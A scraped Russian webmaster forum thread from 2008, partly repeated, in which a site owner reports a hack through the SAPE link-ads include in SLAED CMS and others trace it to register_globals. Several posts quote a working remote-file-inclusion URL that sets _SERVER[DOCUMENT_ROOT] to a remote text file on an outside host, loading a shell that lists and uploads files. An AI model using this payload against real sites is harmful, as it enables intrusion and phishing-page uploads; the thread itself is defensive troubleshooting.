Код SAPE,проблема безопасности возможность заливки шелла

Abend · 14.11.2008, 09:16

Здравствуйте. Умельцы залили мне на сайт фишинг страницу с помощью вот это ссылки http://www.ххххххххх.net//index.php?_SERVER[DOCUMENT_ROOT]=http://www.mazcotaz.com/extra/Format.txt?&act=ls&d=/home/хххххх/www/site1/public_html/admin&sort=0a
При нажатии на эту ссылку открывался листинг моих каталогов, с возможностью залить любой файл. Проблема решилась отключением блока с сылками SAPE. Не знаю , как на других CMS, поддвержена этому
SLAED CMS: 2.6 Lite. Суппорты обоих сторон молчат. Мож кто знает, как решить эту проблему. А то не охота терять доходы с сылок.Отключил ссылки на 5 сайтах из-за этого.

Veles · 14.11.2008, 13:01

Цитата:

Сообщение от Abend

Здравствуйте. Умельцы залили мне на сайт фишинг страницу с помощью вот это ссылки http://www.ххххххххх.net//index.php?_SERVER[DOCUMENT_ROOT]=http://www.mazcotaz.com/extra/Format.txt?&act=ls&d=/home/хххххх/www/site1/public_html/admin&sort=0a
При нажатии на эту ссылку открывался листинг моих каталогов, с возможностью залить любой файл. Проблема решилась отключением блока с сылками SAPE. Не знаю , как на других CMS, поддвержена этому
SLAED CMS: 2.6 Lite. Суппорты обоих сторон молчат. Мож кто знает, как решить эту проблему. А то не охота терять доходы с сылок.Отключил ссылки на 5 сайтах из-за этого.

Прочёл два раза, но так и не уловил прямой связи вспарывания сайта с блоком ссылок SAPE. Отключение блоков - это уже следствие...
Подробнее, плиз...

Abend · 14.11.2008, 15:56

В CMS в index.php стоит код

Код:

if (!defined('_SAPE_USER')){
        define('_SAPE_USER', '***'); 
    }
    require_once($_SERVER['DOCUMENT_ROOT'].'/'._SAPE_USER.'/sape.php'); 
    $sape_context = new SAPE_context();

И в качестве ссылки для взлома участвовал кусок функции _SERVER [DOCUMENT_ROOT]. Поэтому я и предложил, что виноват этот код. Удалив его, все стало нормально , при нажатии на ссылку ничего не происходило.

Jooz · 14.11.2008, 16:28

Цитата:

Сообщение от Abend

В CMS в index.php стоит код

Код:

if (!defined('_SAPE_USER')){
        define('_SAPE_USER', '***'); 
    }
    require_once($_SERVER['DOCUMENT_ROOT'].'/'._SAPE_USER.'/sape.php'); 
    $sape_context = new SAPE_context();

И в качестве ссылки для взлома участвовал кусок функции _SERVER [DOCUMENT_ROOT]. Поэтому я и предложил, что виноват этот код. Удалив его, все стало нормально , при нажатии на ссылку ничего не происходило.

А это уже как сервер сконфигурировать, сапа тут не не причем.

sitepromoter · 14.11.2008, 22:42

Цитата:

Сообщение от Jooz

А это уже как сервер сконфигурировать, сапа тут не не причем.

Ага, а конкретнее - register_globals: http://ru2.php.net/manual/ru/security.globals.php

Abend · 14.11.2008, 22:53

Дирректива на хосте
Register globals: Off

Ради интереса попробуйте свой сайт перейдите по ссылке

Код:

http://www.Ваш сайт.ru//index.php?_SERVER[DOCUMENT_ROOT]=http://www.mazcotaz.com/extra/Format.txt?&act=ls&d=/путь/к вашей дире/www/site1/public_html/admin&sort=0a

Должен открыться листинг ваших дирректорий. Не знаю, как на других движках, на Slaed 2.6 Lite Final , действует отлично

sitepromoter · 14.11.2008, 23:19

Цитата:

Сообщение от Abend

Дирректива на хосте
Register globals: Off

Вы не доверяете документации?

Цитата с оф.сайта:

Цитата:

В случае, если установленное значение off, переменная $authorized не может быть установлена из внешних данных запроса

Проверил у себя. register_globals off, $_SERVER[DOCUMENT_ROOT] не меняется при передаче из строки браузера.

Кстати, может это движок ваш меняет на on?
В любом случае, всем не помешает проверить свои сайты на безопасность.

Abend · 15.11.2008, 00:39

Да, ВЫ правы.
мой движок меняет на On
Попробовал через htaccess насильно сделать
php_value register _ globals off
Тогда не работает на CMS каталог файлов.

Ну и что вы думаете, в моем случае медицина бессильна?

sitepromoter · 15.11.2008, 01:09

Цитата:

Сообщение от Abend

Да, ВЫ правы.
мой движок меняет на On

Ну и что вы думаете, в моем случае медицина бессильна?

Я так подозреваю что перед кодом сапы надо выключить регистер_глобалс, а после - включить обратно.

zhegloff · 15.11.2008, 01:20

Цитата:

Сообщение от sitepromoter

Я так подозреваю что перед кодом сапы надо выключить регистер_глобалс, а после - включить обратно.

Не поможет

14.11.2008, 09:16	#1
Abend Новичок Регистрация: 14.11.2008 Сообщений: 5 Вес репутации: 0	Код SAPE,проблема безопасности возможность заливки шелла Здравствуйте. Умельцы залили мне на сайт фишинг страницу с помощью вот это ссылки http://www.ххххххххх.net//index.php?_SERVER[DOCUMENT_ROOT]=http://www.mazcotaz.com/extra/Format.txt?&act=ls&d=/home/хххххх/www/site1/public_html/admin&sort=0a При нажатии на эту ссылку открывался листинг моих каталогов, с возможностью залить любой файл. Проблема решилась отключением блока с сылками SAPE. Не знаю , как на других CMS, поддвержена этому SLAED CMS: 2.6 Lite. Суппорты обоих сторон молчат. Мож кто знает, как решить эту проблему. А то не охота терять доходы с сылок.Отключил ссылки на 5 сайтах из-за этого.

14.11.2008, 15:56	#3
Abend Новичок Регистрация: 14.11.2008 Сообщений: 5 Вес репутации: 0	В CMS в index.php стоит код Код: if (!defined('_SAPE_USER')){ define('_SAPE_USER', '***'); } require_once($_SERVER['DOCUMENT_ROOT'].'/'._SAPE_USER.'/sape.php'); $sape_context = new SAPE_context(); И в качестве ссылки для взлома участвовал кусок функции _SERVER [DOCUMENT_ROOT]. Поэтому я и предложил, что виноват этот код. Удалив его, все стало нормально , при нажатии на ссылку ничего не происходило.

14.11.2008, 22:53	#6
Abend Новичок Регистрация: 14.11.2008 Сообщений: 5 Вес репутации: 0	Дирректива на хосте Register globals: Off Ради интереса попробуйте свой сайт перейдите по ссылке Код: http://www.Ваш сайт.ru//index.php?_SERVER[DOCUMENT_ROOT]=http://www.mazcotaz.com/extra/Format.txt?&act=ls&d=/путь/к вашей дире/www/site1/public_html/admin&sort=0a Должен открыться листинг ваших дирректорий. Не знаю, как на других движках, на Slaed 2.6 Lite Final , действует отлично Последний раз редактировалось Abend; 14.11.2008 в 23:02.

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Скоро зима (техника безопасности)	RadoM	Курилка	1	29.10.2008 09:29
Брешь в безопасности	kuraga	Ошибки при работе с системой	0	02.10.2008 16:03
Проблема с sape	legent	Вопросы от новичков	8	12.06.2008 12:51
Проблема с установкой Sape в DLE	Aesha	Ошибки при работе с системой	4	12.09.2007 13:10
Проблема с роботом SAPE	bs1	Вопросы по работе системы	2	28.07.2007 13:30

15.11.2008, 00:39	#8
Abend Новичок Регистрация: 14.11.2008 Сообщений: 5 Вес репутации: 0	Да, ВЫ правы. мой движок меняет на On Попробовал через htaccess насильно сделать php_value register _ globals off Тогда не работает на CMS каталог файлов. Ну и что вы думаете, в моем случае медицина бессильна?